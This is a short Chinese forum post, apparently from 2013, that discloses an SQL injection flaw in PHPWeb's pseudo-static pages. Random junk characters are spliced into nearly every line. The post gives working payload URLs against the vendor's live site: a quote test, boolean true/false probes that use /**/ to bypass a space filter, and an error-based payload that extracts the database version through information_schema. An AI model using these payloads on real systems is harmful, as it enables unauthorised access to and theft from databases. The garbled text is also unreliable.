phpweb所有的整站程序伪静态页面都存在sql注入/ @$ z7 N1 e) p$ B) C ^" [
% R* g, w7 D# b* s7 d8 p2 e
主站:http://phpweb.net/
" v7 w6 C( p9 b) F) b4 D* p" R+ v加’检测:
* k/ W( r' y0 S# _7 K
P: W9 r+ a8 }, ghttp://www.phpweb.net/down/html/?772′.html# h6 F9 t7 ]. x9 Y( ~
6 d+ L# x0 o% H# [出错% R) f$ j& _5 S* c$ n( F
存在注入。 \# ?0 G( E |2 T- V0 Z6 B9 H
不能用空格,只能用/*罗$ \- D& v8 a% k( T, I
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
# z# {$ {* v3 x5 o # k$ B) n: A4 s6 F7 Z
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.) D1 R% J# ]: R9 g C, r7 w
爆数据库版本:
6 G6 X! r: `2 ]# D 0 L; q! \) I% p4 `5 E* y
?
1 u6 J! \. E( j9 ^1
, Z7 y$ |5 m( y/ ihttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
7 K7 E. e- m! M* J. }更新日期: 2013-01-03 13:39:50 ) }' p6 Q* [! N8 i6 a6 a* r; z
|
发表于 2013-1-4 19:46:42
收藏
支持
反对